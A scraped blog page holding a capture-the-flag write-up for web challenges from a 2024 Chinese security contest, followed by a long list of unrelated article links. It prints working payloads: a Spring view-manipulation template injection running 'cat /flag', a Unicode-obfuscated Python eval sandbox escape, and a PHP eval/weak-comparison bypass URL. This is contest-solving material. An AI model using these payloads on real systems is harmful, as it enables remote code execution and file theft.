当前位置: 首页 > news >正文

【Web】御网杯信息安全大赛2024 wp(全)

news 来源:原创 2024/9/22 21:22:50

目录

input_data 

admin

flask 

如此多的FLAG

一夜醒来之全国CTF水平提升1000倍😋

input_data 

访问./.svn后随便翻一翻拿到flag 

admin

dirsearch扫出来 

 

访问./error看出来是java框架

 

 测出来是/admin;/路由打Spring View Manipulation(Java)的SSTI

https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability

payload:

/admin;/?path=__%24%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7D__%3A%3A.x

 ​​​​​​​

flask 

题目附件

from flask import Flask, request, Response
import random
import reapp = Flask(__name__)@app.route('/')
def index():evalme = request.args.get('evalme')if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):return 'hacker?'with open(eval(evalme), 'rb') as f:return Response(f.read())if __name__ == '__main__':app.run(port=8080)

用这个

GitHub - Macr0phag3/parselmouth: 自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework

python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

 删去空格得到payload:

?evalme=𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒎a𝒙(𝒅𝒊c𝒕(𝒋𝒐𝒊𝒏=())))(𝒎a𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎a𝒑(𝒄𝒉𝒓,[47,102,108,97,103]))

如此多的FLAG

初始界面有提示

访问./F1aaj.php 

看cookie

 访问./FLLL4g.php

 

简单的php bypass,最后走一个eval代码注入变量覆盖弱比较 

 payload:

http://101.200.58.4:20005/FLLL4g.php?X[]=99999&Y=0e1284838308&Z=1;$f1ag=0

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Python语法(二)——函数
  • vue3 组合式API defineEmits() 与 emits 组件选项
  • STM32 单片机最小系统全解析
  • Linux自主学习篇
  • Qt Creator项目模板介绍
  • 视频相关处理
  • MQ入门(4)
  • 【Python】Maya:为人类打造的 Python 日期时间库
  • 抓机遇,促发展——2025第十二届广州国际汽车零部件加工技术及汽车模具展览会
  • Java内存泄漏排查
  • Ansible部署与应用基础
  • Git清除某文件所有历史提交记录
  • 【Redis】之Geo
  • 【机器学习】——线性回归(自我监督学习)
  • 秒变 Vim 高手:必学的编辑技巧与隐藏功能大揭秘
  • ES2017异步函数现已正式可用
  • Git 使用集
  • Koa2 之文件上传下载
  • LeetCode29.两数相除 JavaScript
  • Linux链接文件
  • Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目
  • Python3爬取英雄联盟英雄皮肤大图
  • SpringBoot 实战 (三) | 配置文件详解
  • uva 10370 Above Average
  • vue脚手架vue-cli
  • 道格拉斯-普克 抽稀算法 附javascript实现
  • 工程优化暨babel升级小记
  • 猴子数据域名防封接口降低小说被封的风险
  • 将 Measurements 和 Units 应用到物理学
  • 你不可错过的前端面试题(一)
  • 盘点那些不知名却常用的 Git 操作
  • 提升用户体验的利器——使用Vue-Occupy实现占位效果
  • 我这样减少了26.5M Java内存!
  • 学习使用ExpressJS 4.0中的新Router
  • d²y/dx²; 偏导数问题 请问f1 f2是什么意思
  • LIGO、Virgo第三轮探测告捷,同时探测到一对黑洞合并产生的引力波事件 ...
  • 好程序员大数据教程Hadoop全分布安装(非HA)
  • 曾刷新两项世界纪录,腾讯优图人脸检测算法 DSFD 正式开源 ...
  • (11)工业界推荐系统-小红书推荐场景及内部实践【粗排三塔模型】
  • (Java入门)学生管理系统
  • (Note)C++中的继承方式
  • (STM32笔记)九、RCC时钟树与时钟 第二部分
  • (阿里云在线播放)基于SpringBoot+Vue前后端分离的在线教育平台项目
  • (层次遍历)104. 二叉树的最大深度
  • (二)c52学习之旅-简单了解单片机
  • (附源码)基于SpringBoot和Vue的厨到家服务平台的设计与实现 毕业设计 063133
  • (六)库存超卖案例实战——使用mysql分布式锁解决“超卖”问题
  • (使用vite搭建vue3项目(vite + vue3 + vue router + pinia + element plus))
  • (转)程序员疫苗:代码注入
  • (转)关于多人操作数据的处理策略
  • ****** 二 ******、软设笔记【数据结构】-KMP算法、树、二叉树
  • .gitignore不生效的解决方案
  • .NET Core日志内容详解,详解不同日志级别的区别和有关日志记录的实用工具和第三方库详解与示例
  • .NET Project Open Day(2011.11.13)
  • .net6 当连接用户的shell断掉后,dotnet会自动关闭,达不到长期运行的效果。.NET 进程守护